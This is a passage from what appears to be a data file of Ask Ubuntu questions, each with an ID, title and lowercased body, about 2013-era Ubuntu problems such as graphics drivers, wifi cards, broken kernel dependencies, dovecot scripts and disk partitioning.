if this imply using another vpn server , i can evaluate it ) .
329644	xserver-xorg-video-intel - 2:2.21.6 has a bug - how do i update ?	i 'm on raring and the xserver for my intel hardware ( xserver-xorg-video-intel - 2:2.21.6 ) has a bug . running pd ( pure data ) reliably crashes x . it 's a known bug ( see here ) and it has been fixed in version 2:2.21.11 . i need pure data in ubuntu for a project , so this bug really kills my work flow . is there any way to know , if there will be an update for raring to 2:2.21.11 or newer for raring ? or will i have to wait until october for saucy ? cheers , thomas
329649	how can i be sure to install the latest amd/ati graphics driver	i currently have the graphic gpu as follows : [ url ] http : //us.toshiba.com/computers/laptops/satellite/p770/p775d-s7144 [ /url ] no longer being sold but to help you determine the best driver for my system processor* amd quad-core a8-3520m accelerated processor & graphics engine* amd radeonâ˘ hd 6620g this processor is no slouch in ubuntu 12.4 . but i however want to keep my driver the best and newest possible since i 'm now gaming with steam on linux.any help would be greatly appreciated . and a shout out to linus torvalds for creating an awesome os that makes computing fun again !
329664	amd radeon hd 3000 series ( i installed but where is aticonfig )	i had dell studio 1536 laptop with windows vista defaults already installed . recently i decided to shift from microsoft windows to ubuntu . i installed ubuntu gnome 3 . after installation it 's look like that everything is ok. but i found that ubuntu perform much more slowly than vista ! ! ! i discovered that ubuntu uses an alternative driver for my graphic card . take a look to this : then i decided to download & install proper ati ( amd ) driver , from here . my on-board graphic card is : ati radeon hd 3200 the question : is it important to remove previous amd driver which installed by default ? and then what is aticonfig ? save x window configuration file ? take a look to this screen shot : any suggestion would become helpful
329668	always show keyboard shortcuts in gnome — take effect without a restart	i just discovered that many gnome dialog boxes do have keyboard shortcuts to reach controls or tabs with alt+letter — only they are not displayed . the shortcuts do appear in the form of an underlined letter when i hold alt down . how can i make the shortcut letter always underlined , so that the shortcuts are discoverable ? same question for menu items , by the way . what i see normally : what i see with alt held down , and i want to see all the time : i found http : //stackoverflow.com/questions/10103922/gnome-3-always-show-altx-keyboard-shortcuts , which suggests adding gtk-auto-mnemonic = 0 to ~/.gtkrc-2.0 for gnome 2 and dconf write /org/gnome/desktop/interface/automatic-mnemonics false for gnome 3 . neither seems to have any effect in my session though . in ubuntu 12.04 , in my sessionafter setting automatic-mnemonics to false , shortcut letters still do n't appear unless i hold alt down ( i tried in pavucontrol , evince and gnome-control-center ) . i start my session from lightdm and i am not running a gnome session . my window manager is sawfish . i do have a d-bus daemon , and other dconf settings take effect immediately ( e.g . /org/gnome/desktop/background/draw-background ) . if i start another session with startx on the same machine , the change of automatic-mnemonics is not reflected . however , if i run a default ( unity or gnome ) session in a different account , automatic-mnemonics takes effect immediately .
329670	dropbox link to www	i have apache installed on my ubuntu 13.04 64-bit . i want to link a folder named html from the dropbox , to the www folder . i pressed right-click on the html folder , and clicked make link , and i cut the linked folder and pasted it in www , and now when i open the web pages inside the html folder from the web browser , it says : forbidden you do n't have permission to access /html/new kora/ on this server . apache/2.2.22 ( ubuntu ) server at 192.168.0.243 port 80 although i chmod -r 777 the linked folder , and to the html folder in dropbox and it did n't work . what is the solution ?
329673	how can i fix program icons that appear as a question mark in the launcher ?	in the left side of the screen there are icons : software center , ubuntu one , etc . system icons can be seen but icons of the programs that i have installed can not be seen . rather there is a `` ? '' for the icons . how can i solve this problem ?
329675	where is the share button in firefox 23 ?	i just upgraded firefox to the latest version to date ( 23 ) and while i can see the new logo , i ca n't find the share button . i tried with all add-ons disabled , but nothing changed . i tried to custom my toolbars , but there was no appropriate button in the proposed stack .
329679	how to get list of user accounts and access through root in ubuntu terminal ?	i am using ubuntu 13.04 and there are 5 users for the machine . i have the root password and i want to see the list of users and access the account through root in terminal . how can i do this ?
329680	post-login scripting for dovecot not working	i have dovecot 1.2.12 running on ubuntu server 10.10 and i 'm trying to get a post-login script to log the date and time that the users access their imap mailbox . i 've read the dovecot wiki and added the following to dovecot.conf : mail_executable : /usr/lib/dovecot/logon.sh /usr/lib/dovecot/imap the logon.sh script is pretty basic ( logging all user access to a single file , plus the touch method given by the wiki ) : # ! /bin/sh dt= $ ( date ) echo $ user $ dt > > /opt/logon touch ~/.last_login with the mail_executable line as above , the script runs successfully when a user attempts to log in , but access to the imap server fails ( clients are roundcube webmail running on the same box , and ms outlook ) . /var/log/mail.log is n't very revealing . the login is logged normally and then nothing follows it : dovecot : imap-login : login : user= < username > , method=plain , rip=172.16.2.26 , lip=172.16.2.26 , secured putting the script after the imap executable , like this : mail_executable : /usr/lib/dovecot/imap /usr/lib/dovecot/logon.sh results in normal imap functionality , but the script does n't run . output of dovecot -n : # 1.2.12 : /etc/dovecot/dovecot.conf # os : linux 2.6.35-32-server x86_64 ubuntu 10.10 ext4 log_timestamp : % y- % m- % d % h : % m : % s disable_plaintext_auth : no login_dir : /var/run/dovecot/login login_executable : /usr/lib/dovecot/imap-login mail_privileged_group : mail mail_location : maildir : /home/ % u/maildir mail_debug : yes mbox_write_locks : fcntl dotlock mail_executable : /usr/lib/dovecot/logon.sh /usr/lib/dovecot/imap auth default : passdb : driver : pam userdb : driver : passwd i feel like i 'm missing something obvious here . please help ! thanks in advance .
329683	how can i fix no hdmi sound output , despite hdmi sound option being available in sound settings ?	so i 'm new here , but after trying my best to sort it out myself , i have to ask what i 'm missing . i have ubuntu 12.04 , on a thinkpad sl400 with nvidia geforce 9300m gs . i 've upgraded the nvidia driver to the `` recommended '' version in the additional drivers section . video output to my toshiba hd tv via hdmi works fine , but not audio . the audio system settings show 4 options : hdmi/displayport digital output ( s/pdif ) headphones speakers the speakers on the laptop produce sound , but the hdmi speakers do not . i appreciate any help on solving this .
329684	ca n't connect to site hosted on ubuntu server vm	yesterday i had my ubuntu server vm successfully hosting a website that i could access by typing in the ip of the vm ( virtualbox bridged adapter ) in my client 's browser . today i ca n't access it . i checked ifconfig and got this back for eth0 : eth0 link encap : ethernet hwaddr 08:00:27:1b:66:66 inet6 addr : fe80 : :aa00:27ff : fe1b:6666/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:3888 ( 3.8 kb ) there is not inet ( ipv4 ) address being shown for eth0 . why did this disappear and how can i get it back ? yesterday it was 192.168.0.128 edit : ping www.google.com returns ping : unknown host www.google.com
329691	is there any procedure for update live server	can someone send me a document with standard procedure for updating live server . is there such thing ? we make the updates to our system once per week , but we are not sure if there is some specification how and when should be done . thanks ,
329693	about ubuntu desktop12 ssh	in ubuntu , ssh server is ok. at ps -e | grep ssh has hdserver . but ca n't connect ssh from windows . wrong info with `` time out connect '' . the server is in the same lan . in ubuntu , i use ssh name @ ip and successfully connects to the server . who can help me ?
329695	wifi not working on lenovo z570 ubuntu 12.04	i installed ubuntu 12.04 precise on a lenovo z570 , but the wifi is n't working . i noticed that the wifi network is unclaimed using the command sudo lshw -c network . anybody can help ? wifi card : intel corporation centrino wireless-n 1000 here are my system info : salim @ ss-host : ~ $ uname -a linux ss-host 3.5.0-37-generic # 58-ubuntu smp mon jul 8 22:10:28 utc 2013 i686 i686 i386 gnu/linux dmesg | grep iwl returns nothing . salim @ ss-host : ~ $ sudo lshw -c network -network unclaimed description : network controller product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f1500000-f1501fff -network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 05 serial : f0 : de : f1 salim @ ss-host : ~ $ ifconfig eth0 link encap : ethernet hwaddr f0 : de : f1 : f5:35:45 inet addr:93.185.234.79 bcast:93.185.235.255 mask:255.255.252.0 inet6 addr : fe80 : :f2de : f1ff : fef5:3545/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:237882 errors:0 dropped:0 overruns:0 frame:0 tx packets:151943 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:250091722 ( 250.0 mb ) tx bytes:11595953 ( 11.5 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1032 errors:0 dropped:0 overruns:0 frame:0 tx packets:1032 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:115095 ( 115.0 kb ) tx bytes:115095 ( 115.0 kb ) salim @ ss-host : ~ $ lspci |grep network 03:00.0 network controller : intel corporation centrino wireless-n 1000 thank you .
329696	screenshot tool with integrated optipng or pngcrush	this is a followup question of how do i get maximal compressed screenshots ? is there a screenshot tool that has optipng or pngcrush already included to minimize the filesizes of the png screenshots ? i personally favoritize shutter , but any screenshoter would be great that would create optimized pngs . maybe there are plugins available ?
329697	unable to remove kde plasma desktop environment from ubuntu 13.04	i am running ubuntu 13.04 on my desktop . i installed kde 4.10.4 but i dint like it . so i tried following instructions from this site to uninstall kde completely but i keep getting the following error . reading package lists ... done building dependency tree reading state information ... done package 'plasma-widget-telepathy-presence ' is not installed , so not removed e : unable to locate package kubuntu-docs e : unable to locate package libkdcraw21 e : unable to locate package libkipi9 e : unable to locate package libktorrent4 e : unable to locate package libktpcommoninternalsprivate3 e : unable to locate package libokularcore1abi1 e : unable to locate package plasma-widget-telepathy-chat how do i fix this and remove kde from my desktop ?
329699	texmaker installation error 'failed to fetch file '	texmaker installation says failed to fetch file from server . check your internet connection . my internet connection has no problems ! !
329704	syslinux : no default or ui configuration directive found !	i have a usb live key created with linux live usb creator . i used all the defaults , and got a standard version of ubuntu . when i try to boot into it , i get the error above . i went through the rest of the threads with no avail . things i tried : renaming the files ( my files were already syslinux.cfg , etc . ) typing in mboot.c32 -c boot.cfg into the boot : __ prompt any help would be appreciated !
329707	mac os x virtualization with kvm on the mac mini : seabios error	since i 'm a legal owner of the first generation of mac mini with a regular snow leopard license , i 'm trying to follow this tutorial with the goal to virtualize mac os x with kvm on the second part of the hard disk where i have installed linux ubuntu . you can find the guide here : http : //www.contrib.andrew.cmu.edu/~somlo/osxkvm/ the problem arises when i have to install/configure the seabios package . this is what happens : ... . compiling whole program out/ccode16.o compiling to assembler out/asm-offsets.s generating offset file out/asm-offsets.h compiling ( 16bit ) out/romlayout.o building ld scripts version : rel-1.7.3-18-g7093aa5-dirty-20130807_120248-ziomario-macmini traceback ( most recent call last ) : file `` ./tools/layoutrom.py '' , line 669 , in main ( ) file `` ./tools/layoutrom.py '' , line 633 , in main info16 = parseobjdump ( infile16 , '16 ' ) file `` ./tools/layoutrom.py '' , line 564 , in parseobjdump relocsection = sectionmap [ sectionname ] keyerror : '.text.asm./media/ziomario/09274c80-4a49-4f4f-9e2e-83c4a5578a04/osxguest/seabios /src/smp.c.75' make : * [ out/romlayout16.lds ] errore 1 can someone help me to fix this error ? thanks .
329709	i ca n't boot of ubuntu os when my windows 7 hibernates	i have ubuntu 12.10 and windows 7 home basic in one machine . after i put my windows 7 to hibernate and then when i press the power button , instead of loading the boot options or grub screen it directly boots windows 7 . i 've read in some forum that pressing esc after you press the power button , but even it could n't help me as the laptop started making a loud noise . please help me on how should i boot os while hibernate w7 and again resume w7 after shutting down ubuntu . thanks in anticipation .
329710	bind command lines to keys	is there a way to make this command line to activate every time i press a certain button ? xdotool key xf86monbrightnessdown i mean how can i bind it to a key ? also , which one of the keycodes are important and need to be used when binding ? scancode keycode or key number ?
329711	how can i uninstall ubuntu 12.04 from a dualboot ( dualbooted with usbstick ) windows 7 ?	i installed ubuntu 12.04 and now i want it deleted from my computer . i installed ubuntu on a usb stick so i could dualboot my hp with windows 7 but now i want it removed . how do i do this ?
329714	what is the purpose of the 'nobody ' user ?	after i read list all human users i noticed that there is a user account named 'nobody ' in my ubuntu system . also i noticed that i can login in this account from terminal using the following command and my password : sudo su nobody it does n't mind me at all , but i want to know what is the purpose of this user ? is it created by default on a fresh install of ubuntu or is created by installing a particular package ?
329715	problem with ralink wifi card	my laptop is hp probook 4520s and i have a wireless interface ralink . after running lshw -c network , the results are : *-network disabled description : wireless interface product : rt3090 wireless 802.11n 1t/1r pcie vendor : ralink physical id : 0 bus info : pci @ 0000:44:00.0 logical name : ra0 version : 00 serial : e0:2a:82:55:22 : c0 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ralink wlan driverversion=2.4.0.4 latency=0 multicast=yes wireless=ralink sta resources : irq:19 memory : d0300000-d030ffff but when i type airmon-ng it shows like this : ra0 ralink 2560 pci rt2500 please can anyone help me . i need to stop using the rt2500 driver and install the rt3090 driver . my linux kernel version is 3.2.6 . thanks .
329720	is it necessary to install virtualization or vm ware to use ubuntu on a pc laptop ?	this relates to learning rubyonrails which i believe is often installed on or with ubuntu .
329722	count ftp/user logins	i managed to assign multiple ftp accouts to the same folder on the server over web interface , but i also want to track them . i wonder if there is a way to count the ftp logins of a linux user . i can get the online users with the `` users '' command . maybe i should count each minute with cron who is online ? no no no . any ideas ?
329723	where to get ubuntu phone/touch daily updates for the nexus 4 ?	i 'm currently using ubuntu touch ( mako # 17 ) on my new nexus 4 ( my only phone ) and i 'm having difficulties finding where ? to get the daily builds or latest releases for the phablet-flash . i have followed the touch wiki , added the ppa , and i do daily phablet-flash updates , but still after a week i keep getting the same `` old '' ? # 17 version , what , if anything , am i doing wrong ? best regards from sweden
329728	please help building ladosc on 64bit raring	this is a question for the code savy , which i 'm not ... i 'm trying to build a set of oldish ladspa plug-ins called ladosc ( you can find them on google-code ) but there are errors i ca n't find a workaround for . the makefile : destination_dir=~/.ladspa liblo_static=/usr/lib/liblo.a install : install_op install_osc install_op : op.so mkdir -p $ { destination_dir } cp op.so $ { destination_dir } /.ladspa op.so : operator.o ld operator.o -o op.so -shared operator.o : operator.c gcc -c operator.c install_osc : osc.so mkdir -p $ { destination_dir } cp osc.so $ { destination_dir } /.ladspa osc.so : osc.o $ { liblo_static } ld osc.o $ { liblo_static } -o osc.so -shared osc.o : lad-osc.c gcc -c -g lad-osc.c -o osc.o clean : rm *.o *~ *.so there is no configure script and when i make , the linker throws the following error : ld : operator.o : relocation r_x86_64_32s against `.rodata ' can not be used when making a shared object ; recompile with -fpic operator.o : could not read symbols : bad value when i add -fpic flags to the gcc calls in the makefile the build runs differently and the linker gives the following error : ld osc.o /usr/lib/liblo.a -o osc.so -shared ld : /usr/lib/liblo.a ( liblo_la-address.o ) : relocation r_x86_64_32 against `.rodata.str1.1 ' can not be used when making a shared object ; recompile with -fpic /usr/lib/liblo.a : could not read symbols : bad value i do not understand this . does it mean i have to recompile liblo ? it is taken directly from the ubunut repos . these issues have been raised already by someone else on the project pages on google code about 3 years ago but the developer did n't react . i already searched for explanations and found lots of stuff about position independent code and differences between 32bit and 64bit but i do n't understand enough to find a solution for my problem . can anybody help me to get these plug-ins up and running ? cheers , thomas
329734	creating partitions	i want to install ubuntu 12.04 lts 64 bit . can i partition my hdd like this ? /boot - 1gb ; / - 100gb ( this much since i 'm planning to have a virtual os inside ubuntu ) ; swap - 4gb ( i have 2gb of ram ) ; lastly a fat32 storage containing the rest of my 640gb hdd ~ 535gb will this just fine ? i do n't want a separate storage partition , say /home , written in ext4 . i think , fat32 is better . i 'm not sure really . any suggestions ? thanks guys : d
329737	unable to use bluetooth	bluetooth service is running sudo service bluetooth status bluetooth start/running , process 1009 however , when i start bluetooth manager , it says there is no device and seems like bluetooth is disabled or something is wrong . also : hcitool dev devices : what 's up with it ? as you can see , all buttons are disabled .
329741	installing fritz wireless usb adapter	how do i install a fritz usb wireless adapter on ubuntu so i can access the internet ? i have the software required , but i am not sure what to do next . ubuntu version 13.04 . output of lsusb : don @ don-ms-7327 : ~ $ lsusb bus 001 device 003 : id 0781:556b sandisk corp . bus 001 device 004 : id 057c:6201 avm gmbh avm fritz ! wlan v1.1 [ texas instruments tnetw1450 ] bus 002 device 002 : id 413c:2101 dell computer corp. smartcard reader keyboard bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 1.1 root hub don @ don-ms-7327 : ~ $ what do i do next ?
329745	how can i manually install gcc tarball file in ubuntu 12.04 ?	how can i manually install gcc tarball file in ubuntu 12.04 ?
329746	what is the `` dash '' and where is it ?	i 'm trying to make a bootable usb stick . it says `` open the dash and search for startup disk creator '' . what is the `` dash '' ? and where is it ?
329747	system freeze / lockup fglrx drivers [ 12.04 ]	i 'm using an e45m1-i deluxe ( amd e450 series with onboard graphics ) with 4gb ram running ubuntu 12.04 with catalyst 13.6beta . my system freezes after a few minutes when a graphical interface is running .
329749	ubuntu being ... not too fast ?	yeah i know there is enough of similar questions already - why ubuntu is slow and blah blah . but , seriously . i have pretty ok-ish specs - desktop pc with intel i3 and 4 gb ram . when i 'm on windows i run a lot of programs - ide , skype , photoshop and a couple of browsers with lots of tabs open and never run into performance issues . alt+tab`ing between windows is smooth and multitasking is awesome . but then i run ubuntu and get none of this . alt+tab takes a second to appear on the screen , programs launch a bit slow for the first time , faster afterwards though . switching between open programs feels slow . not too slow , but not fast either , while i have enough specs to have it fast . i have read a bunch of guides on how to improve the overall performance ( like switching to old unity 2d and using `` preload '' tool ) , tried some of it but never achieved similar multitasking performance comparing to windows . am i doing something wrong ? or is it just how ubuntu is ? i 'm a web-developer and i really want to switch to unix from windows , but i 'm really used to having tons of programs being open and comfortably switching between them and multitask and unfortunately i could n't achieve this with ubuntu . quick edit : i 'm dualbooting with windows and ubuntu using grub . i did n't use wubi to install ubuntu . i have an intel hd graphics adapter , could this be a problem ? my swap is 4 gb , and i tried playing around with swappiness , did n't improve the speed much
329754	unable to connect to internet via ar8161 ethernet card	i have a desktop which uses only an ar8161 ethernet card to connect to the internet but it does not work whenever i go into ubuntu . is it a driver issue or some configuration issue ? how can i go about resolving it ?
329756	razer megalodon usb with ubuntu 13.04 = disaster	here is my current setup : asus g53sx + logitech g500 mouse + razer megalodon headset . here is my problem : if i for example want to listen to a song , the sound that comes out of the speakers sounds horrible , like the speaker is broken . i know for a fact that the headset is not broken since it works perfectly in windows 7/8 . but ( ! ) when i change it from 7.1 to 4.1 it `` crackling '' disappears and the problem appears to go away , until i reboot ( it 's still set to 4.1 when i 've rebooted ) and the `` crackling '' starts again . if i then set it to 7.1 ( still crackling ) and then back to 4.1 , the `` crackling '' goes away . i 've googled the shizzle out of my problem but i 've not yet found a solution . i 've tried all kinds of mixers/sound handling software and nothing appears to be working . minor note : the microphone is not working properly . thanks for taking your time and reading and hopefully helping me out . regards , victor .
329759	how to record im conversations	i wonder if there 's any tool by which i can record my audio/video conversations in skype or google talk ! my ubuntu version : 12.04 skype version : 4.2.0.11 google talk plugin : 4.2.1.0 webcam : logitech c525 thanks for the reply .
329762	error updating softwares	i recently removed some repository by mistake and now i can not update the softwares using the `` software updater '' . additionally , when i do a sudo apt-get update command in the terminal , i get the following message : - gpg error : http : //ppa.launchpad.net raring release : the following signatures could n't be verified because the public key is not available : no_pubkey 82eb5823f4fe239d how can i correct this and is there any way i can `` re-install '' all the original repositories . p.s : i am a relative noob when it comes to ubuntu .
329765	run oracle vm virtualbox on ubuntu 13.04	when i try to run oracle vm virtualbox , it says that i need to add a kernel module and recompile the linux kernel for it to work . the error i get is : warning : the vboxdrv kernel module is not loaded . either there is no module available for the current kernel or it failed to load . please recompile the kernel module and install it by sudo /etc/init.d/vboxdrv setup i downloaded oracle vm virtualbox from their download site and selected the deb package for ubuntu 13.04 amd64 how would i do that ?
329767	update and upgrade error 12.04 and 13.04	i am running ubuntu 12.04 and the update manager keeps requesting i do a partial upgrade to for ubuntu 13.04 kernel headers and image . i only have notices to upgrade on long term releases . are these kernel headers and image needed for precise if not how to i get around/rid of them . i have no 13.04 software sources and i did not try to upgrade to 13.04 .
329769	live booted lubuntu on 512 mb of ram on dell inspiron 6000 , chromium always crashes when trying to go to a webpage	here is the error message ... either chrome ran out of memory or the process for the webpage was terminated for some other reason . to contine , reload or go to another page . it keeps happening and i have no idea what to do , i really need help .
329775	terminal command to remove unknown file	what is the command to remove unknown file from terminal . edit after following answer : example : i have two files يا مهدي- times-يا محمد events.html مهدي events.html how do i only first file ?
329781	why is full compression not used during squash ?	was interested to know why , with space/bandwidth at such a premium , is full compression not used during squash . for example , calling mksquashfs with the -comp xz -b 1m options at compression time creates an archive which weighs in at about 80 % of the original filesystem.squashfs ; yet appears to retain full integrity as both an installation and live image . does anybody have some intel here ?
329784	installing ubuntu with windows	i am using windows 7 professional currently.i want to use ubuntu at the same time. ! how to use both os at same time .
329785	pygtk 2 gtk 2 alternative to style_class_primary_toolbar	in gtk3 toolbar context style can be set to gtk.style_class_primary_toolbar to make it look native in ubuntu , but in gtk2 there is no toolbar.get_style_context ( ) method and no style_class_primary_toolbar constant either , is there any way to accomplish this in gtk2 ?
329787	broken dependency 12.04-12.10 ( linux-image-3.8.0-27-generic )	i need some help on how to fix this problem . i ran the following . wbmc @ wbmc-thinkpad-r51 : ~ $ sudo apt-get update fetched 674 kb in 4s ( 141 kb/s ) reading package lists ... done wbmc @ wbmc-thinkpad-r51 : ~ $ sudo apt-get clean wbmc @ wbmc-thinkpad-r51 : ~ $ sudo apt-get -f remove linux-image-generic reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-generic : depends : linux-image-generic ( = 3.8.0.27.45 ) but it is not going to be installed linux-image-extra-3.8.0-27-generic : depends : linux-image-3.8.0-27-generic but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . wbmc @ wbmc-thinkpad-r51 : ~ $ sudo apt-get -f remove linux-image-extra-3.8.0-27-generic reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-image-generic : depends : linux-image-3.8.0-27-generic but it is not going to be installed depends : linux-image-extra-3.8.0-27-generic but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . wbmc @ wbmc-thinkpad-r51 : ~ $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-image-extra-3.8.0-27-generic : depends : linux-image-3.8.0-27-generic but it is not installed linux-image-generic : depends : linux-image-3.8.0-27-generic but it is not installed e : unmet dependencies . try using -f. wbmc @ wbmc-thinkpad-r51 : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libavahi-ui-gtk3-0 libblas3gf libcelt0-0 libfm-gtk1 libfm1 libgdu-gtk0 libgrail5 libkms1 libllvm3.1 libmenu-cache1 libmjpegtools-1.9 libntfs10 libopencv-calib3d2.3 libopencv-core2.3 libopencv-features2d2.3 libopencv-flann2.3 libopencv-highgui2.3 libopencv-imgproc2.3 libopencv-objdetect2.3 libopenspc0 libqpdf8 libsox1b libtbb2 libunique-3.0-0 libwebp2 libx264-120 linux-headers-3.5.0-37 linux-headers-3.5.0-37-generic python3.2 python3.2-minimal use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-image-3.8.0-27-generic suggested packages : fdutils linux-doc-3.8.0 linux-source-3.8.0 linux-tools the following new packages will be installed : linux-image-3.8.0-27-generic 0 upgraded , 1 newly installed , 0 to remove and 29 not upgraded . 3 not fully installed or removed . need to get 12.1 mb of archives . after this operation , 26.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //us.archive.ubuntu.com/ubuntu/ raring-updates/main linux-image-3.8.0-27-generic i386 3.8.0-27.40 [ 12.1 mb ] fetched 12.1 mb in 15s ( 794 kb/s ) ( reading database ... 333748 files and directories currently installed . ) unpacking linux-image-3.8.0-27-generic ( from ... /linux-image-3.8.0-27-generic_3.8.0-27.40_i386.deb ) ... this kernel does not support a non-pae cpu . dpkg : error processing /var/cache/apt/archives/linux-image-3.8.0-27-generic_3.8.0-27.40_i386.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.8.0-27-generic /boot/vmlinuz-3.8.0-27-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.8.0-27-generic /boot/vmlinuz-3.8.0-27-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.8.0-27-generic_3.8.0-27.40_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) wbmc @ wbmc-thinkpad-r51 : ~ $ sudo apt-get install linux-image-486 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-image-486 wbmc @ wbmc-thinkpad-r51 : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-image-extra-3.8.0-27-generic : depends : linux-image-3.8.0-27-generic but it is not installed linux-image-generic : depends : linux-image-3.8.0-27-generic but it is not installed e : unmet dependencies . try using -f. wbmc @ wbmc-thinkpad-r51 : ~ $ cat /etc/apt/sources.list # deb cdrom : [ xubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) ] / precise main multiverse restricted universe # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release i386 ( 20130424 ) ] / raring main restricted deb http : //us.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ raring-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ raring-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //us.archive.ubuntu.com/ubuntu/ raring universe deb http : //us.archive.ubuntu.com/ubuntu/ raring-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ raring multiverse deb http : //us.archive.ubuntu.com/ubuntu/ raring-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //security.ubuntu.com/ubuntu raring-security main restricted deb-src http : //security.ubuntu.com/ubuntu raring-security main restricted deb http : //security.ubuntu.com/ubuntu raring-security universe deb-src http : //security.ubuntu.com/ubuntu raring-security universe deb http : //security.ubuntu.com/ubuntu raring-security multiverse deb-src http : //security.ubuntu.com/ubuntu raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu quantal main # deb-src http : //extras.ubuntu.com/ubuntu quantal main
329788	i ca n't install flash on ubuntu 13.04	i 'm installing lubuntu 13.04 ( updated really ) and i 'm having trouble installing flash . i had trouble with the previous version too . i managed by doing all the updates i possibly could find ! well now i 'm completely updated . i saw some directions for a couple of commands to enter at a terminal , but it told me that i do n't have the rights , ca n't unlock a folder . i 'm the only one on my netbook . any and all help is most appreciated . i 'm terribly sorry if i did n't follow some procedure on asking .
329789	how to list all files within subdirectories without the path ?	i have 1000 directories and 5-15 sub directories within them containing mp3 files . i want to make a list of all the songs without their paths . is it doable ? or is there a way to obtain the word after the last `` \ '' from the path so that we can retrieve the file-name from it ? some regular expressions or something ?
329791	command to restore files from an unknown file format ?	i have many directories inside a parent directory and using dd i gave the parent directory .img extension as following : dd if=/home/xyz/parentdirectory of=/home/xyz/backup_parent.img how do i get back again the parent directory ? i tried sudo dd if=/home/xyz/backup_parent.img of=/home/xyz/parentdirectory.tar.bz2 and sudo dd if=/home/xyz/backup_parent.img of=/home/xyz/parentdirectory which did n't work . any other workaround ?
329801	no root file system is defined	here the steps i used to install ubuntu . booted ubuntu 13.04 from a usb drive ( i have xp ) . everything going fine . gave me options how to install . chose `` other '' as i have multiple drives . gave me the option which drive to use . screen came up with all my drives and the partitions on each . ( ps it would be really useful if drive letters were included in the list ! ) highlighted the drive/partition i wanted to use : /dev/sdc2 screen showed `` device for boot loader installation : /dev/sdc2 ( so far , so good - i think ) clicked on `` install now '' and get the message `` no root file system is defined . please correct this from the partitioning menu '' . but , does n't tell me where the partitioning menu is ! i double clicked on the drive/partition i want to use , and a small `` edit partition '' window opens . i assume this is the partitioning menu . allows me to change the size of the partition ( it should already be big enough ) . `` use as '' i had set up as ntfs ( there were 10 choices to pick from . from some of the comments on here it sounds like i should be using ext4 . is that right ? next line is a checkbox with `` format the partition '' . did n't do that . it 's a new partition . next line `` mount point '' i put /dos . again from other comments on here it looks like i should be using / - right ? if i change the above to ext4 and / will it continue to install ? do n't know what else to expect after this ?
